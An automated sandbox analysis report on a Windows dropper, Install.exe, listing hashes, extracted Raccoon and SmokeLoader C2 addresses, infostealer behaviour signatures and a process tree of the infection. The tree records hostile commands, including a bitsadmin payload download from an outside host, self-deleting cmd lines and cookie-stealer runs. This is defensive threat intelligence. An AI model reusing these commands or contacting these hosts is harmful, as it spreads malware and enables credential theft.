Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1613s
  • max time network
    1618s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    04-05-2021 05:53

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 50 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 40 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 34 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:352
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1228
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s SENS
        1⤵
          PID:1352
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
          1⤵
            PID:1276
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
            1⤵
              PID:1104
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1852
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                1⤵
                  PID:2456
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                  1⤵
                    PID:2616
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Browser
                    1⤵
                      PID:2864
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                      1⤵
                        PID:2644
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                        1⤵
                          PID:2472
                        • C:\Users\Admin\AppData\Local\Temp\Install.exe
                          "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4036
                          • C:\Users\Admin\AppData\Local\Temp\is-S9HSC.tmp\Install.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-S9HSC.tmp\Install.tmp" /SL5="$20116,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                            2⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:512
                            • C:\Users\Admin\AppData\Local\Temp\is-6CDF1.tmp\Ultra.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-6CDF1.tmp\Ultra.exe" /S /UID=burnerch1
                              3⤵
                              • Drops file in Drivers directory
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Drops file in Program Files directory
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:2684
                              • C:\Program Files\Windows Defender Advanced Threat Protection\QBDGNCLYVV\ultramediaburner.exe
                                "C:\Program Files\Windows Defender Advanced Threat Protection\QBDGNCLYVV\ultramediaburner.exe" /VERYSILENT
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:3776
                                • C:\Users\Admin\AppData\Local\Temp\is-QPCT5.tmp\ultramediaburner.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-QPCT5.tmp\ultramediaburner.tmp" /SL5="$6005C,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\QBDGNCLYVV\ultramediaburner.exe" /VERYSILENT
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of WriteProcessMemory
                                  PID:1176
                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                    6⤵
                                    • Executes dropped EXE
                                    PID:3896
                              • C:\Users\Admin\AppData\Local\Temp\1f-8a8ea-0b7-70db5-69919251d2fb7\Viraexicypo.exe
                                "C:\Users\Admin\AppData\Local\Temp\1f-8a8ea-0b7-70db5-69919251d2fb7\Viraexicypo.exe"
                                4⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2080
                              • C:\Users\Admin\AppData\Local\Temp\7f-facbc-685-729aa-73bc2061ffdba\Cumizhesyna.exe
                                "C:\Users\Admin\AppData\Local\Temp\7f-facbc-685-729aa-73bc2061ffdba\Cumizhesyna.exe"
                                4⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:2176
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nzn2o5wq.cwo\sskiper.exe /s & exit
                                  5⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4572
                                  • C:\Users\Admin\AppData\Local\Temp\nzn2o5wq.cwo\sskiper.exe
                                    C:\Users\Admin\AppData\Local\Temp\nzn2o5wq.cwo\sskiper.exe /s
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4760
                                    • C:\Users\Admin\AppData\Local\Temp\1783142209.exe
                                      C:\Users\Admin\AppData\Local\Temp\1783142209.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:3796
                                    • C:\Users\Admin\AppData\Local\Temp\1917044102.exe
                                      C:\Users\Admin\AppData\Local\Temp\1917044102.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:5320
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\nzn2o5wq.cwo\sskiper.exe & exit
                                      7⤵
                                        PID:6068
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping 0
                                          8⤵
                                          • Runs ping.exe
                                          PID:4352
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dch3wtxs.y0e\KiffMainE1.exe & exit
                                    5⤵
                                      PID:5032
                                      • C:\Users\Admin\AppData\Local\Temp\dch3wtxs.y0e\KiffMainE1.exe
                                        C:\Users\Admin\AppData\Local\Temp\dch3wtxs.y0e\KiffMainE1.exe
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1788
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tp2h1i0v.u5x\001.exe & exit
                                      5⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:4216
                                      • C:\Users\Admin\AppData\Local\Temp\tp2h1i0v.u5x\001.exe
                                        C:\Users\Admin\AppData\Local\Temp\tp2h1i0v.u5x\001.exe
                                        6⤵
                                        • Executes dropped EXE
                                        PID:4320
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rfjjt2hw.ryv\installer.exe /qn CAMPAIGN="654" & exit
                                      5⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:4440
                                      • C:\Users\Admin\AppData\Local\Temp\rfjjt2hw.ryv\installer.exe
                                        C:\Users\Admin\AppData\Local\Temp\rfjjt2hw.ryv\installer.exe /qn CAMPAIGN="654"
                                        6⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Enumerates connected drives
                                        • Modifies system certificate store
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of WriteProcessMemory
                                        PID:4592
                                        • C:\Windows\SysWOW64\msiexec.exe
                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\rfjjt2hw.ryv\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\rfjjt2hw.ryv\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619848179 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                          7⤵
                                            PID:4980
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sd03sfuh.i4e\gpooe.exe & exit
                                        5⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:4288
                                        • C:\Users\Admin\AppData\Local\Temp\sd03sfuh.i4e\gpooe.exe
                                          C:\Users\Admin\AppData\Local\Temp\sd03sfuh.i4e\gpooe.exe
                                          6⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Suspicious use of WriteProcessMemory
                                          PID:4368
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4116
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                              PID:5460
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\13zhn2am.elv\google-game.exe & exit
                                          5⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:4952
                                          • C:\Users\Admin\AppData\Local\Temp\13zhn2am.elv\google-game.exe
                                            C:\Users\Admin\AppData\Local\Temp\13zhn2am.elv\google-game.exe
                                            6⤵
                                              PID:5108
                                              • C:\Windows\SysWOW64\rundll32.exe
                                                "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                7⤵
                                                • Loads dropped DLL
                                                • Modifies registry class
                                                • Suspicious use of WriteProcessMemory
                                                PID:5032
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ndoeebp4.ffl\y1.exe & exit
                                            5⤵
                                              PID:5260
                                              • C:\Users\Admin\AppData\Local\Temp\ndoeebp4.ffl\y1.exe
                                                C:\Users\Admin\AppData\Local\Temp\ndoeebp4.ffl\y1.exe
                                                6⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:5624
                                                • C:\Users\Admin\AppData\Local\Temp\oOEXVtBqdB.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\oOEXVtBqdB.exe"
                                                  7⤵
                                                    PID:5052
                                                    • C:\Users\Admin\AppData\Roaming\1620107499013.exe
                                                      "C:\Users\Admin\AppData\Roaming\1620107499013.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620107499013.txt"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:5764
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\oOEXVtBqdB.exe"
                                                      8⤵
                                                        PID:5956
                                                        • C:\Windows\SysWOW64\PING.EXE
                                                          ping 127.0.0.1 -n 3
                                                          9⤵
                                                          • Executes dropped EXE
                                                          • Runs ping.exe
                                                          PID:5920
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ndoeebp4.ffl\y1.exe"
                                                      7⤵
                                                        PID:5884
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /T 10 /NOBREAK
                                                          8⤵
                                                          • Delays execution with timeout.exe
                                                          PID:5096
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\weszjgba.2th\askinstall39.exe & exit
                                                    5⤵
                                                      PID:5796
                                                      • C:\Users\Admin\AppData\Local\Temp\weszjgba.2th\askinstall39.exe
                                                        C:\Users\Admin\AppData\Local\Temp\weszjgba.2th\askinstall39.exe
                                                        6⤵
                                                          PID:5920
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                            7⤵
                                                              PID:5764
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im chrome.exe
                                                                8⤵
                                                                • Kills process with taskkill
                                                                PID:700
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rjcjuguy.oal\setup.exe & exit
                                                          5⤵
                                                            PID:6028
                                                            • C:\Users\Admin\AppData\Local\Temp\rjcjuguy.oal\setup.exe
                                                              C:\Users\Admin\AppData\Local\Temp\rjcjuguy.oal\setup.exe
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:5084
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\rjcjuguy.oal\setup.exe"
                                                                7⤵
                                                                  PID:5892
                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                    ping 1.1.1.1 -n 1 -w 3000
                                                                    8⤵
                                                                    • Runs ping.exe
                                                                    PID:4200
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y4jrkn2t.sjv\SunLabsPlayer.exe /S & exit
                                                              5⤵
                                                                PID:5236
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:5108
                                                                • C:\Users\Admin\AppData\Local\Temp\y4jrkn2t.sjv\SunLabsPlayer.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\y4jrkn2t.sjv\SunLabsPlayer.exe /S
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Drops file in Program Files directory
                                                                  PID:5412
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn9A15.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:5056
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn9A15.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:4160
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn9A15.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:5816
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn9A15.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:4560
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn9A15.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:5040
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn9A15.tmp\tempfile.ps1"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:5460
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn9A15.tmp\tempfile.ps1"
                                                                              7⤵
                                                                              • Checks for any installed AV software in registry
                                                                              PID:4664
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:5052
                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                              7⤵
                                                                              • Download via BitsAdmin
                                                                              PID:4372
                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pziF0KFaFHeETEUi -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Drops file in Program Files directory
                                                                              PID:5128
                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pAFQ0AcHzbfsw1Wo -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:2032
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn9A15.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:5732
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn9A15.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:3740
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn9A15.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:3576
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn9A15.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:4812
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn9A15.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:4880
                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\PzbYEKUDEJ\PzbYEKUDEJ.dll" PzbYEKUDEJ
                                                                                        7⤵
                                                                                        • Loads dropped DLL
                                                                                        PID:4672
                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\PzbYEKUDEJ\PzbYEKUDEJ.dll" PzbYEKUDEJ
                                                                                          8⤵
                                                                                          • Loads dropped DLL
                                                                                          • Drops file in System32 directory
                                                                                          PID:4200
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn9A15.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                          PID:5688
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn9A15.tmp\tempfile.ps1"
                                                                                          7⤵
                                                                                            PID:5668
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn9A15.tmp\tempfile.ps1"
                                                                                            7⤵
                                                                                            • Blocklisted process makes network request
                                                                                            PID:5240
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn9A15.tmp\tempfile.ps1"
                                                                                            7⤵
                                                                                              PID:4116
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn9A15.tmp\tempfile.ps1"
                                                                                              7⤵
                                                                                                PID:3576
                                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                PID:4812
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bb04btbo.uza\005.exe & exit
                                                                                            5⤵
                                                                                              PID:5512
                                                                                              • C:\Users\Admin\AppData\Local\Temp\bb04btbo.uza\005.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\bb04btbo.uza\005.exe
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2224
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0c2q1vzn.bhm\ifhwwyy.exe & exit
                                                                                              5⤵
                                                                                                PID:4276
                                                                                                • C:\Users\Admin\AppData\Local\Temp\0c2q1vzn.bhm\ifhwwyy.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\0c2q1vzn.bhm\ifhwwyy.exe
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4552
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:764
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5812
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\czlsw2ok.131\toolspab1.exe & exit
                                                                                                5⤵
                                                                                                  PID:4828
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\czlsw2ok.131\toolspab1.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\czlsw2ok.131\toolspab1.exe
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:4468
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\czlsw2ok.131\toolspab1.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\czlsw2ok.131\toolspab1.exe
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Checks SCSI registry key(s)
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:4720
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                          1⤵
                                                                                          • Drops file in System32 directory
                                                                                          PID:928
                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                          1⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4004
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                            2⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Checks processor information in registry
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Modifies registry class
                                                                                            PID:4408
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                          1⤵
                                                                                          • Drops file in Windows directory
